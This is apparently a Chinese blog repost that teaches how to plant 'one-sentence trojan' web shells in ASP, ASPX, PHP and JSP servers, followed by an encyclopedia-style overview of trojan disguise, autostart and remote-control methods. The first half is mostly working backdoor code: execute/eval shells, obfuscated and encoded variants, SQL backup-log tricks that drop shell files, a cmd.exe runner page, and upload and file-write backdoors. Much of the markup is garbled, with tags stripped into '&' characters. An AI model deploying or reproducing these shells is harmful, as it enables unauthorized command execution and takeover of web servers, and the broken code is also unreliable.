11027人阅读
一句话木马的工作原理：一句话木马分析服务端与客户端。
"一句话木马"服务端（是用于本地的html提交脚本木马文件）就是我们要用来插入到asp文件中的asp语句，（不仅仅是以asp为后缀的数据库文件），该语句将回为触发，接收入侵者通过客户端提交的数据，执行并完成相应的操作，服务端的代码内容为 &%execute request("value")%& 其中value可以自己修改
"一句话木马"客户端（远程服务器上被插入一句话的asp可执行文件）用来向服务端提交控制数据的，提交的数据通过服务端构成完整的asp功能语句并执行，也就是生成我们所需要的asp木马文件
一句话木马的适用环境：1.服务器的来宾账户有写入权限2.已知数据库地址且数据库格式为asa或asp3.在数据库格式不为asp或asa的情况下，如果能将一句话插入到asp文件中也可
现在先假设在远程主机的TEXT.ASP(客户端）中已经有了&%execute request("value")%&这个语句.)在ASP里&%execute ............")%&意思是执行省略号里的语句.那么如果我写进我们精心构造的语句,它也是会帮我们执行的.就按照这上面的思路,我们就可以在本地构造一个表单内容如下:(//为注释)
&action=http://主机路径/TEXT.asp&method=post&&&name=value&cols=120&rows=10&width=45&&set&lP=server.createObject("Adodb.Stream")//建立流对象& &lP.Open&//打开 &lP.Type=2&//以文本方式 &lP.CharSet="gb2312"&//字体标准 &lP.writetext&request("newvalue") &&lP.SaveToFile&server.mappath("newmm.asp"),2&//将木马内容以覆盖文件的方式写入newmm.asp，2就是已覆&盖的方式& &lP.Close&//关闭对象 &set&lP=nothing&//释放对象 &response.redirect&"newmm.asp"&//转向newmm.asp &&&&&name=newvalue&cols=120&rows=10&width=45添入生成木马的内容&&type=submit&value=提交&&&&
表单的作用就是把我们表单里的内容提交到远程主机的TEXT.ASP这个文件.然后因为TEXT.ASP里有&%execute request("value")%&这句,那么这句代码就会执行我们从表单里传来的内容哦.(表单名必须和&%execute request("value")%&里的VALUE一样,就是我用蓝色标记的那两处,必须相等)
说到这里大家是不是清楚了.我们构造了两个表单,第一个表单里的代码是文件操作的代码(就是把第二个表单内的内容写入在当前目录下并命名为newvalue.ASP的这么一段操作的处理代码)那么第二个表单当然就是我们要写入的马了.
具体的就是下面这一段:
set&lP=server.createObject("Adodb.Stream")//建立流对象& &lP.Open&//打开 &lP.Type=2&//以文本方式 &lP.CharSet="gb2312"&//字体标准 &lP.writetext&request("newvalue") &&lP.SaveToFile&server.mappath("newvalue.asp"),2&//将木马内容以覆盖文件的方式写入newmm.asp，2就是已覆&盖的方式& &lP.Close&//关闭对象 &set&lP=nothing&//释放对象 &response.redirect&"newmm.asp"&//转向newmm.asp &&
这样的话第二个表单的名字必须和lP.writetext request("newvalue") 里的Newvalue一样,就是我用红色标注的那两处.至此只要服务器有写的权限你表单所提交的大马内容就会被写入到newmm.asp中。即newmm.asp为我们的shell地址。
关于服务器错误：
经常,当我们在一个asp文件内添加了一句话后,就会出现类型不匹配的错误:&
Script&error&detected&at&line&1.& &Source&line:&execute&request("nettoo")& &Description:&类型不匹配:&'execute'&
这个如何解决呢?想出了一个好办法,只要用"eval"替换掉"execute"服务端,就不会出错了! 用一句话客户端连接，加入容错语句，你可以把它插入到任何ASP文件而不会像以前一样出错。&%On Error Resume Next execute request("value")%&
常见asp一句话木马的变体：
%set&ms&=&server.CreateObject("MSScriptControl.ScriptControl.1") &ms.Language="VBScript"&ms.AddObject&"Response",&Response &ms.AddObject&"request",&request &ms.AddObject&"session",&session &ms.AddObject&"server",&server &ms.AddObject&"application",&application &ms.ExecuteStatement&("ex"&"ecute(request(chr(35)))")%&&
&%ExecuteGlobal request(chr(35))%&
&%ExecuteGlobal request(chr(35))%&
&%execute request("#")%&
&%execute request(chr(35))%&
&script language=VBScript runat=server&if request(chr(35))&&"""" thenExecuteGlobal request(chr(35))&/script&
&%ExecuteGlobal request(chr(35))%& 9月30日
&%eval request("#")%&
数据库里插入┼攠数畣整爠焕敌瑳&∣┩忾
utf-7的马&%@ codepage=65000%&&% response.Charset="936"%&&%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%&
&%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")ms.Language="VBScript"ms.AddObject "Response", Responsems.AddObject "request", requestms.AddObject "session", sessionms.AddObject "server", serverms.AddObject "application", applicationms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%&
&%@ LANGUAGE = VBScript.Encode %&&%#@~^PgAAAA==r6P. ;!+/D`14Dv&X#*@!@*ErPPD4+ P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb*oBMAAA==^#~@%&
各种环境下的一句话木马：
1.相当于ASP的一句话木马:
alter database pubs set RECOVERY FULL--create table pubs.dbo.cmd(a image)backup log pubs to disk = 'c:/TM' with initinsert into pubs.dbo.cmd(a) values ('&%@ Page Language="C#" validateRequest="false" %&&%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write(Request.Params["l"]);ow.Close()%& ')backup log pubs to disk = 'd:/test11.aspx'//这个和asp的一样，客户端post一个变量l 把木马代码丢在变量l里面就ok了 这个是类似asp的一句话木马。//mu.aspx.htm 客户端:(提交后访问:http://IP/images.aspx)&
&action=http://192.168.2.100/asp/mu.aspx&method=post& &在下面输入大马内容:&&name=l&cols=120&rows=35&width=45& &%@&Page&Language="VB"&Debug="true"&%&%@&import&Namespace="system.IO"&%&%@&import&Namespace="System.Diagnostics"&%&&runat="server"& &Sub&RunCmd(Src&As&Object,&E&As&EventArgs)& &Dim&myProcess&As&New&Process()& &Dim&myProcessStartInfo&As&New&ProcessStartInfo(xpath.Text)& &myProcessStartInfo.UseShellExecute&=&False& &myProcessStartInfo.RedirectStandardOutput&=&true& &myProcess.StartInfo&=&myProcessStartInfo& &myProcessStartInfo.Arguments=xCmd.text &myProcess.Start() &Dim&myStreamReader&As&StreamReader&=&myProcess.StandardOutput& &Dim&myString&As&String&=&myStreamReader.Readtoend() &myProcess.Close() &mystring=replace(mystring,"","") &mystring=replace(mystring,"","") &result.text=&vbcrlf&&&""&&&mystring&&&"" &End&Sub& &&ASP.NET&Shell&for&WebAdmin2.X&Final&&http-equiv="Content-Type"&c&&&runat="server"&&id="L_p"&style="COLOR:&#0000ff"&runat="server"&width="80px";Program&&id="xpath"&style="BORDER-RIGHT:&#084b8e&1px&&BORDER-TOP:&#084b8e&1px&&BORDER-LEFT:&#084b8e&1px&&BORDER-BOTTOM:&#084b8e&1px&solid"&runat="server"&Width="300px"c:/windows/system32/cmd.exe&&&id="L_a"&style="COLOR:&#0000ff"&runat="server"&width="80px"Arguments&&id="xcmd"&style="BORDER-RIGHT:&#084b8e&1px&&BORDER-TOP:&#084b8e&1px&&BORDER-LEFT:&#084b8e&1px&&BORDER-BOTTOM:&#084b8e&1px&solid"&runat="server"&Width="300px"&Text="/c&net&user"/c&net&user&&&id="Button"&style="BORDER-RIGHT:&#084b8e&1px&&BORDER-TOP:&#084b8e&1px&&BORDER-LEFT:&#084b8e&1px&&COLOR:&#&BORDER-BOTTOM:&#084b8e&1px&&BACKGROUND-COLOR:&#719bc5"&runat="server"&Width="100px"&Text="Run"&&id="result"&style="COLOR:&#0000ff"&runat="server"&&& &&type=submit&value=提交&
2、下面这个是我找网上的asp.net的上传文件程序，修改精简了下，也可以用：
drop table pubs.dbo.cmdalter database pubs set RECOVERY FULLcreate table pubs.dbo.cmd(a image)backup log pubs to disk = 'c:/TM' with initinsert into pubs.dbo.cmd(a) values ('&script language="c#" runat="server"&private void bc(object o,EventArgs e) {string u="files";int pos=f.PostedFile.FileName.LastIndexOf("//");filename=f.PostedFile.FileName.Substring(pos + 1);f.PostedFile.SaveAs(Server.MapPath(u)+"//"+filename);}&/script&&form method="post" runat="server"&&input type="file" id="f" runat="server"/&&input type="submit" value="ss" runat="Server" /&&/form&')backup log pubs to disk = 'c:/inetpub/wwwroot/test11.aspx'
本文没有什么特别之处，仅求抛砖引玉。并送给和我一样菜的在PHP门边徘徊的朋友。刚学PHP没几天，我就急于功成，所以有错误及不足之处请大家积极指出。PHP语法的强大是ASP望尘莫及的，仅一个:&? phpinfo();?&就可以刺探整个服务器的配置。运行cmd，上传文件等，都是非常简便的，现在用的好的PHP木马，莫过于angel的phpspy了。昨天hak_ban问怎么给PHP木马加密，我还没想到，但是对于写一个微型PHP木马，我想还是很难被杀的。这里简单探讨一下几个函数可以作为木马的使用：1． 可以运行外部命令的几个函数：system,passthru,exec,shell_exec,popen。例：只要将&?system($cmd);?&等保存为cmd.php及可实现运行外部命令的功能。这几个函数可以说是最早的微行php木马了，所以一般虚拟主机的设置也会将这些函数屏蔽的。2．还记得WDB论坛的style.php的漏洞吗？我们可以利用这个做个很难被杀的小木马。如下：&
&include($include);&
将其保存为1.php ，我们就可以调用其他不支持php服务器里的.php木马（如phpspy.php）来达到我们的目的：/1.php? Include=/phpspy.php这里是不支持php的，否则将会在这台服务器运行phpspy.php,而不是目标服务器。3． 这个还是angel在Discuz 2.2F的攻击中给我们的一个非常好的上传木马，我没有改：&
($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);&
将其保存为up.php后，在本地提交表单：&
&ENCTYPE="multipart/form-data"&ACTION="http://目标服务器/up.php"&METHOD="POST"&&NAME="MyFile"&TYPE="file"&&VALUE="&提交&"&TYPE="submit"&&
就可以把大个的php木马上传上去。4． 我一直在想有没有同冰狐浪子的那个ASP一句话木马一样通过本地表单提交运行的PHP木马。终于找到了函数：eval，在PHP4中文参考手册上它的语法说明：语法: void eval(string code_str);内容说明：本函数可将字符串之中的变量值代入，通常用在处理数据库的资料上。参数 code_str 为欲处理的字符串。值的 注意的是待处理的字符串要符合 PHP 的字符串格式，同时在结尾处要有分号。使用本函数处理后的字符串会沿续到 PHP 程序结束。我们可以在目标主机上保存:&?eval($cmd);?&为一个PHP文件（我想也可以插在PHP任意文件里）。然后通过本地提交来达到目的，但与ASP不同的是，在magic_quotes_gpc = on的时候，过滤的很多的字符，使得这个使用功能大大的缩小。对于这个PHP木马本地表单我做了很多次，还没有成熟的代码。还请高手指教。写好后会奉献给大家的。但是eval这个函数可以做微型PHP木马是无须质疑的。 Ps:写完后，有人告诉我，其实高手早就有微型的PHP木马了，只是没有公开。哎，我好郁闷啊，研究的都是人家早就有了的成果。不管怎么样，和大家分享一下我的研究，希望能得到帮助和指教。
＜% &if(request.getParameter("f")!=null)(new&java.io.FileOutputStream(application.getRealPath("//")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); &%＞&
这个 后门估计不用我说了吧.还是提示一下咯.保存为1.jsp 提交url!
http://localhost/1.jsp?f=1.txt&t=hello
然后:http://localhost/1.txt 就出来了 内容为 hello .....
参考知识库
* 以上用户言论只代表其个人观点，不代表CSDN网站的观点或立场
访问：83175次
排名：千里之外
转载：37篇
(9)(1)(5)(1)(15)(15)计算机恶意代码
毁坏、窃取被种者的文件
基本简介/木马
木马“木马”程序是目前比较流行的病毒文件，与一般的病毒不同，它不会自我繁殖，也并不“刻意”地去感染其他文件，它通过将自身伪装吸引用户下载执行，向施种木马者提供打开被种者的门户，使施种者可以任意毁坏、窃取被种者的文件，甚至被种者的电脑。“木马”与计算机网络中常常要用到的远程控制软件有些相似，但由于远程控制软件是“善意”的控制，因此通常不具有隐蔽性；“木马”则完全相反，木马要达到的是“偷窃”性的远程控制，如果没有很强的隐蔽性的话，那就是“毫无价值”的。
起源传说/木马
木马木马（Trojan）这个名字来源于传说，它是指通过一段特定的程序（木马程序）来控制另一台计算机。木马通常有两个：一个是客户端，即控制端，另一个是服务端，即被控制端。木马的设计者为了防止木马被发现，而采用多种手段隐藏木马。木马的服务一旦运行并被控制端连接，其控制端将享有服务端的大部分操作权限，例如给计算机增加，浏览、移动、复制、删除文件，修改，更改计算机配置等。随着病毒编写技术的发展，木马程序对用户的威胁越来越大，尤其是一些木马程序采用了极其狡猾的手段来隐蔽自己，使普通用户很难在中毒后发觉。 特洛伊木马：木马全称为（Trojan Horse）。 “特洛伊木马”这一词最早出先在传说中。相传在3000年前，在一次希腊战争中。（人名）派兵讨伐（王国），但久攻不下。他们想出了一个主意：首先他们假装被打败，然后留下一个木马。而木马里面却藏着最强悍的勇士！最后等时间一到，木马里的勇士全部冲出来把敌人打败了！
运行原理/木马
木马一、基础知识一个完整的木马系统由部分，软件部分和具体连接部分组成。 (1)硬件部分：建立木马连接所必须的硬件实体。 控制端：对服务端进行远程控制的一方。 服务端：被控制端远程控制的一方。 INTERNET：控制端对服务端进行远程控制，传输的网络载体。 (2)软件部分：实现远程控制所必须的软件程序。 控制端程序：控制端用以远程控制服务端的程序。 木马：潜入服务端内部，获取其操作权限的程序。 木马配置程序：设置木马程序的端口号，触发条件，木马名称等，使其在服务端藏得更隐蔽的程序。 (3)具体连接部分：通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。 控制端，服务端IP：即控制端，服务端的网络地址，也是木马进行数据传输的目的地。 控制端端口，木马端口：即控制端，服务端的数据入口，通过这个入口，数据可直达控制端程序或木马程序。配置木马一般来说一个设计成熟的木马都有木马配置程序，从具体的配置内容看，主要是为了实现以下两方面功能： (1)木马伪装：木马配置程序为了在服务端尽可能的好的隐藏木马，会采用多种伪装手段，如修改图标 ，捆绑文件，定制端口，自我销毁等。(2)信息反馈：木马配置程序将就信息反馈的方式或地址进行设置，如设置信息反馈的邮件地址，IRC号 ，ICO号等等。二、传播木马木马(1)传播方式: 木马的传播方式主要有两种：一种是通过，控制端将木马程序以附件的形式夹在邮件中发送出去，收信人只要打开附件系统就会感染木马；另一种是软件下载，一些非正规的网站以提供软件下载为名义，将木马捆绑在软件安装程序上，下载后，只要一运行这些程序，木马就会自动安装。 (2)伪装方式:鉴于木马的危害性，很多人对木马知识还是有一定了解的，这对木马的传播起了一定的抑制作用，这是木马设计者所不愿见到的，因此他们开发了多种功能来伪装木马，以达到降低用户警觉，欺骗用户的目的。 (一)修改图标当你在E-MAIL的附件中看到这个图标时，是否会认为这是个文本文件呢?但是我不得不告诉你，这也有可能是个木马程序，现在已经有木马可以将木马服务端程序的图标改成HTML，TXT，ZIP等各种文件的图标，这有相当大的迷惑性，但是目前提供这种功能的木马还不多见，并且这种伪装也不是无懈可击的，所以不必整天提心吊胆，疑神疑鬼的。 (二)捆绑文件这种伪装手段是将木马捆绑到一个上，当安装程序运行时，木马在用户毫无察觉的情况下，偷偷的进入了系统。至于被捆绑的文件一般是可执行文件(即EXE，COM一类的文件)。 (三)出错显示有一定木马的人都知道，如果打开一个文件，没有任何反应，这很可能就是个木马程序，木马的设计者也意识到了这个缺陷，所以已经有木马提供了一个叫做出错显示的功能。当用户打开木马程序时，会弹出一个如下图所示的错误提示框(这当然是假的)，错误内容可自由定义，大多会定制成 一些诸如“文件已破坏，无法打开的！”之类的信息，当服务端用户信以 为真时，木马却悄悄侵入了系统。 (四)定制端口很多老式的木马端口都是固定的，这给判断是否感染了木马带来了方便，只要查一下特定的端口就知道感染了什么木马，所以现在很多新式的木马都加入了定制端口的功能，控制端用户可以在1024---65535之间任选一个端口作为木马端口(一般不选1024以下的端口)，这样就给判断 所感染木马类型带来了麻烦。 (五)自我销毁这项功能是为了弥补木马的一个缺陷。我们知道当服务端用户打开含有木马的后，木马会将自己拷贝到WINDOWS的系统文件夹中(C：WINDOWS或C：WINDOWSSYSTEM目录下)，一般来说原木马文件和系统文件夹中的木马文件的大小是一样的(捆绑文件的木马除外)，那么中了木马的朋友只要在近来收到的信件和下载的软件中找到原木马文件，然后根据原木马的大小去系统 文件夹找相同大小的文件，判断一下哪个是木马就行了。而木马的自我销毁功能是指安装完木马后，原木马文件将自动销毁，这样服务端用户就很难找到木马的来源，在没有查杀木马的工 具帮助下，就很难删除木马了。 (六)木马更名安装到系统文件夹中的木马的文件名一般是固定的，那么只要根据一些查杀木马的文章，按图索骥在系统文件夹查找特定的文件，就可以断定中了什么木马。所以现在有很多木马都允许控制端用户自由定制安装后的木马文件名，这样很难判断所感染的木马类型了。 三.运行木马木马服务端用户运行木马或捆绑木马的程序后，木马就会自动进行安装。首先将自身拷贝到WINDOWS的 系统文件夹中(C:WINDOWS或C:WINDOWSSYSTEM目录下)，然后在注册表，启动组，非启动组中设置好木马 的触发条件 ，这样木马的安装就完成了。安装后就可以启动木马了。(1)由触发条件激活木马触发条件是指启动木马的条件，大致出现在下面八个地方: 1.：打开HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion下的五个以Run 和RunServices主键，在其中寻找可能是启动木马的键值。 2.WIN.INI：C:WINDOWS目录下有一个配置文件win.ini，用文本方式打开，在[windows]字段中有启动 命令 load=和run=，在一般情况下是空白的，如果有启动程序，可能是木马。 3.SYSTEM.INI：C:WINDOWS目录下有个配置文件system.ini，用文本方式打开，在[386Enh]，[mic]， [drivers32]中有命令行，在其中寻找木马的启动命令。4.Autoexec.bat和Config.sys:在C盘根下的这两个文件也可以启动木马。但这种加载方式一般都 需要控制端用户与服务端建立连接后，将已添加木马启动命令的同名 文件上传 到服务端覆盖这两个文件才行。 5.*.INI：即应用程序的启动配置文件，利用这些文件能启动程序的特点，将制作好的带有木马 启动命令的同名文件上传到服务端覆盖这同名文件，这样就可以达到启动木马的目的了。 6.注册表：HKEY_CLASSES_ROOT文件类型\shellopencommand主键，查看其键值。举个例子，国产木马“”就是修改HKEY_CLASSES_ROOT xtfileshellopencommand下的键值，将“C :WINDOWS NOTEPAD.EXE %1”改为“C:WINDOWSSYSTEMSYXXXPLR.EXE %1”，这时你双 击一个TXT文件 后，原本应用NOTEPAD打开文件的，现在却变成启动木马程序了。还要说明 的是不光是TXT文件 ，通过修改HTML，EXE，ZIP等文件的启动命令的键值都可以启动木马 ，不同之处只在于“文件类型”这个主键的差别，TXT是txtfile，ZIP是WINZIP，大家可以 试着去找一下。 7.捆绑文件：实现这种触发条件首先要控制端和服务端已通过木马建立连接，然后控制端用户用工具 软件将木马文件和某一应用程序捆绑在一起，然后上传到服务端，这样即使 木马被删 除了，只要运行捆绑了木马的应用程序，木马又会被安装上去了。 8.启动：在“开始---程序---启动”选项下也可能有木马的触发条件。(2)木马运行过程木马被激活后，进入内存，并开启事先定义的木马端口，准备与控制端建立连接。这时服务端用 户可以在MS-DOS方式下，键入NETSTAT -AN查看端口状态，一般个人电脑在脱机状态下是不会有端口 开放的，如果有端口开放，你就要注意是否感染木马了。下面是感染木马后，用NETSTAT命令查 看端口的两个实例： 其中①是服务端与控制端建立连接时的显示状态，②是服务端与控制端还未建立连接时的显示状态。 在上网过程中要下载软件，发送信件，网上聊天等必然打开一些端口，下面是一些常用的端口： (1)1---1024之间的端口：这些端口叫保留端口，是专给一些对外通讯的程序用的，如FTP使用21，SMTP使用25，POP3使用110等。只有很少木马会用保留端口作为木马端口的。 (2)1025以上的连续端口：在上网浏览网站时，浏览器会打开多个连续的端口下载文字，图片到本地 硬盘上，这些端口都是1025以上的连续。 (3)4000端口：这是OICQ的通讯端口。 (4)6667端口：这是IRC的通讯端口。 除上述的端口基本可以排除在外，如发现还有其它端口打开，尤其是数值比较大的端口，那就要怀疑 是否感染了木马，当然如果木马有定制端口的功能，那任何端口都有可能是木马端口。 四.信息泄露木马一般来说，设计成熟的木马都有一个信息反馈机制。所谓信息反馈机制是指木马成功安装后会收集 一些服务端的软硬件信息，并通过E-MAIL，IRC或的方式告知控制端用户。 从反馈信息中控制端可以知道服务端的一些软硬件信息，包括使用的操作系统，系统目录，分区况， 系统口令等，在这些信息中，最重要的是服务端IP，因为只有得到这个参数，控制端才能与服务端建立 连接，具体的连接方法我们会在下一节中讲解。 五.建立连接一个木马连接的建立首先必须满足两个条件：一是服务端已安装了木马程序；二是控制端，服务端都要在线 。在此基础上控制端可以通过木马端口与服务端建立连接。假设A机为控制端，B机为服务端，对于A机来说要与B机建立连接必须知道B机的木马端口和IP地 址，由于木马端口是A机事先设定的，为已知项，所以最重要的是如何获得B机的IP地址。获得B机的IP地址的方法主要有两种：反馈和IP扫描。因为B机装有木马程序，所以它的木马端口7626是处于开放状态的，所以现在A机只 要扫描IP地址段中7626端口开放的主机就行了，例如图中B机的IP地址是202.102.47.56，当A机扫描到 这个IP时发现它的7626端口是开放的，那么这个IP就会被添加到列表中，这时A机就可以通过木马的控 制端程序向B机发出连接信号，B机中的木马程序收到信号后立即作出响应，当A机收到响应的信号后，开启一个随即端口1031与B机的木马端口7626建立连接，到这时一个木马连接才算真正建立。值得一提 的要扫描整个IP地址段显然费时费力，一般来说控制端都是先通过信息反馈获得服务端的IP地址，由于 拨号上网的IP是动态的，即用户每次的IP都是不同的，但是这个IP是在一定范围内变动的，如图中 B机的IP是202.102.47.56，那么B机上网IP的变动范围是在202.102.000.000---202.102.255.255，所以 每次控制端只要搜索这个IP地址段就可以找到B机了。 六.远程控制木马木马连接建立后，控制端端口和木马端口之间将会出现一条通道。控制端上的控制端程序可藉这条通道与服务端上的木马程序取得联系，并通过木马程序对服务端进行远程控制。(1)窃取：一切以明文的形式，*形式或缓存在CACHE中的密码都能被木马侦测到，此外很多木马还 提供有击键记录功能，它将会记录服务端每次敲击键盘的动作，所以一旦有木马入侵， 密码将很容易被窃取。(2)文件操作：控制端可藉由远程控制对服务端上的文件进行删除，新建，修改，上传，下载，运行，更改属 性等一系列操作，基本涵盖了WINDOWS平台上所有的文件操作功能。 (3)修改注册表：控制端可任意修改服务端注册表，包括删除，新建或修改主键，子键，键值。有了这 项功能控制端就可以禁止服务端软驱，的使用，锁住服务端的注册表，将服务端 上木马的触发条件设置得更隐蔽的一系列高级操作。 (4)系统操作：这项内容包括重启或关闭服务端操作系统，断开服务端网络连接，控制服务端的，键盘，监视服务端桌面操作，查看服务端进程等，控制端甚至可以随时给服务端发送信息，想象一下，当服务端的桌面上突然跳出一段话，不吓人一跳才怪。
病毒种类/木马
木马1、破坏型 惟一的功能就是破坏并且删除文件，可以自动的删除电脑上的、INI、EXE文件。2、密码发送型可以找到隐藏密码并把它们发送到指定的信箱。有人喜欢把自己的各种密码以文件的形式存放在计算机中，认为这样方便；还有人喜欢用WINDOWS提供的密码记忆功能，这样就可以不必每次都输入密码了。许多黑客软件可以寻找到这些文件，把它们送到黑客手中。也有些软件长期潜伏，记录操作者的键盘操作，从中寻找有用的密码。在这里提醒一下，不要认为自己在文档中加了密码而把重要的保密文件存在公用计算机中，那你就大错特错了。别有用心的人完全可以用穷举法暴力破译你的密码。利用WINDOWS API和对当前运行的所有程序的所有窗口（包括控件）进行遍历，通过窗口标题查找密码输入和出确认重新输入窗口，通过按钮标题查找我们应该单击的按钮，通过ES_PASSWORD查找我们需要键入的密码窗口。向密码输入窗口发送WM_SETTEXT消息模拟输入密码，向按钮窗口发送消息模拟单击。在破解过程中，把密码保存在一个文件中，以便在下一个序列的密码再次进行穷举或多部机器同时进行分工穷举，直到找到密码为止。此类程序在黑客网站上唾手可得，精通程序设计的人，完全可以自编一个。3、远程访问型最广泛的是特洛伊马，只需有人运行了服务端程序，如果客户知道了服务端的IP地址，就可以实现远程控制。以下的程序可以实现观察“害者”正在干什么，当然这个程序完全可以用在正道上的，比如监视学生机的操作。程序中用的UDP（User Datagram Protocol，用户报文协议）是因特网上广泛采用的通信协议之一。与TCP协议不同，它是一种非连接的传输协议，没有确认机制，可靠性不如TCP，但它的效率却比TCP高，用于远程屏幕监视还是比较适合的。它不区分服务器端和客户端，只区分发送端和接收端，编程上较为简单，故选用了UDP协议。本程序中用了DELPHI提供的TNMUDP控件。4.键盘记录木马这种特洛伊木马是非常简单的。它们只做一件事情，就是记录受害者的键盘敲击并且在LOG文件里查找密码。据笔者经验，这种特洛伊木马随着Windows的启动而启动。它们有在线和离线记录这样的选项，顾名思义，它们分别记录你在线和离线状态下敲击键盘时的按键情况。也就是说你按过什么按键，下木马的人都知道，从这些按键中他很容易就会得到你的密码等有用信息，甚至是你的信用卡账号哦!当然，对于这种类型的木马，邮件发送功能也是必不可少的。5.DoS攻击木马木马随着DoS攻击越来越广泛的应用，被用作DoS攻击的木马也越来越流行起来。当你入侵了一台，给他种上DoS攻击木马，那么日后这台计算机就成为你DoS攻击的最得力助手了。你控制的肉鸡数量越多，你发动DoS攻击取得成功的机率就越大。所以，这种木马的危害不是体现在被感染计算机上，而是体现在攻击者可以利用它来攻击一台又一台计算机，给网络造成很大的伤害和带来损失。还有一种类似DoS的木马叫做邮件炸弹木马，一旦机器被感染，木马就会随机生成各种各样主题的信件，对特定的邮箱不停地发送邮件，一直到对方瘫痪、不能接受邮件为止。6.代理木马黑客在入侵的同时掩盖自己的足迹，谨防别人发现自己的身份是非常重要的，因此，给被控制的肉鸡种上代理木马，让其变成攻击者发动攻击的跳板就是代理木马最重要的任务。通过，攻击者可以在匿名的情况下使用Telnet，ICQ，IRC等程序，从而隐蔽自己的踪迹。7.FTP木马这种木马可能是最简单和古老的木马了，它的惟一功能就是打开，等待用户连接。现在新FTP木马还加上了密码功能，这样，只有攻击者本人才知道正确的密码，从而进人对方计算机。8.木马上面的木马功能虽然形形色色，不过到了对方机器上要发挥自己的作用，还要过防木马软件这一关才行。常见的防木马软件有ZoneAlarm，Norton Anti-Virus等。程序杀手木马的功能就是关闭对方机器上运行的这类程序，让其他的木马更好地发挥作用。9.木马是木马开发者在分析了防火墙的特性后发现:防火墙对于连入的链接往往会进行非常严格的过滤，但是对于连出的却疏于防范。于是，与一般的木马相反，反弹端口型木马的服务端 (被控制端)使用主动端口，客户端 (控制端)使用被动端口。木马定时监测控制端的存在，发现控制端上线立即弹出端口主动连结控制端打开的主动端口;为了隐蔽起见，控制端的被动端口一般开在80，即使用户使用扫描软件检查自己的端口，发现类似TCP UserIP:1026 ControllerIP:80ESTABLISHED的情况，稍微疏忽一点，你就会以为是自己在浏览网页。
启动方式/木马
木马作为一个优秀的木马，自启动功能是必不可少的，这样可以保证木马不会因为你的一次关机操作而彻底失去作用。正因为该项技术如此重要，所以，很多人员都在不停地研究和探索新的自启动技术，并且时常有新的发现。一个典型的例子就是把木马加入到用户经常执行的程序 (例如explorer.exe)中，用户执行该程序时，则木马自动发生作用。当然，更加普遍的方法是通过修改Windows系统文件和注册表达到目的，现经常用的方法主要有以下几种:1.在Win.ini中启动在Win.ini的[windows]字段中有启动命令"load＝"和"run＝"，在一般情况下 "＝"后面是空白的，如果有后跟程序，比方说是这个样子：run=c:\windows\file.exe load=c:\windows\file.exe要小心了，这个file.exe很可能是木马哦。2.在System.ini中启动System.ini位于Windows的安装目录下，其[boot]字段的shell=Explorer.exe是木马喜欢的隐藏加载之所，木马通常的做法是将该何变为这样:shell=Explorer.exefile.exe。注意这里的file.exe就是木马服务端程序！另外，在System.中的[386Enh]字段，要注意检查在此段内的"driver＝路径\程序名"这里也有可能被木马所利用。再有，在System.ini中的[mic]、[drivers]、[drivers32]这3个字段，这些段也是起到加载驱动程序的作用，但也是增添木马程序的好场所，现在你该知道也要注意这里喽。3.利用注册表加载运行4.在Autoexec.bat和Config.sys中加载运行木马在C盘根目录下的这两个文件也可以启动木马。但这种加载方式一般都需要控制端用户与服务端建立连接后，将己添加木马启动命令的同名文件上传到服务端覆盖这两个文件才行，而且采用这种方式不是很隐蔽。容易被发现，所以在Autoexec.bat和Confings中加载木马程序的并不多见，但也不能因此而掉以轻心。5.在Winstart.bat中启动Winstart.bat是一个特殊性丝毫不亚于Autoexec.bat的批处理文件，也是一个能自动被Windows加载运行的文件。它多数情况下为应用程序及Windows自动生成，在执行了Windows自动生成，在执行了并加截了多数之后开始执行 (这一点可通过启动时按F8键再选择逐步跟踪启动过程的启动方式可得知)。由于Autoexec.bat的功能可以由Witart.bat代替完成，因此木马完全可以像在Autoexec.bat中那样被加载运行，危险由此而来。6.启动组木马们如果隐藏在启动组虽然不是十分隐蔽，但这里的确是自动加载运行的好场所，因此还是有木马喜欢在这里驻留的。启动组对应的文件夹为C:\Windows\start menu\programs\startup，在注册表中的位置:HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Explorer\shellFolders Startup="c:\windows\start menu\programs\startup"。要注意经常检查启动组哦！7.*.INI即应用程序的启动配置文件，控制端利用这些文件能启动程序的特点，将制作好的带有木马启动命令的同名文件上传到服务端覆盖这同名文件，这样就可以达到启动木马的目的了。只启动一次的方式:在winint.ini.中(用于安装较多)。8.修改文件关联修改文件关联是木马们常用手段 (主要是国产木马，老外的木马大都没有这个功能)，比方说正常情况下TXT文件的打开方式为Notepad.EXE文件，但一旦中了文件关联木马，则txt文件打开方式就会被修改为用木马程序打开，如著名的国产木马冰河就是这样干的. "冰河"就是通过修改HKEY_CLASSES_ROOT\txtfile\whell\open\command下的键值，将“C:\WINDOWS\NOTEPAD.EXE本应用Notepad打开，如著名的国产HKEY一CLASSES一ROOT\txt闹e\shell\open\commandT的键值，将 "C:\WINDOWS\NOTEPAD.EXE%l"改为 "C:\WINDOWS\SYSTEM\%l"，这样，一旦你双击一个TXT文件，原本应用Notepad打开该文件，现在却变成启动木马程序了，好狠毒哦!请大家注意，不仅仅是TXT文件，其他诸如HTM、EXE、等都是木马的目标，要小心搂。对付这类木马，只能经常检查HKEY_C\shell\open\command主键，查看其键值是否正常。9.捆绑文件木马实现这种触发条件首先要控制端和服务端已通过木马建立连接，然后控制端用户用工具软件将木马文件和某一应用程序捆绑在一起，然后上传到服务端覆盖源文件，这样即使木马被删除了，只要运行捆绑了木马的应用程序，木马义会安装上去。绑定到某一应用程序中，如绑定到系统文件，那么每一次Windows启动均会启动木马。10.反弹端口型木马的主动连接方式反弹端口型木马我们已经在前面说过了，由于它与一般的木马相反，其服务端 (被控制端)主动与客户端 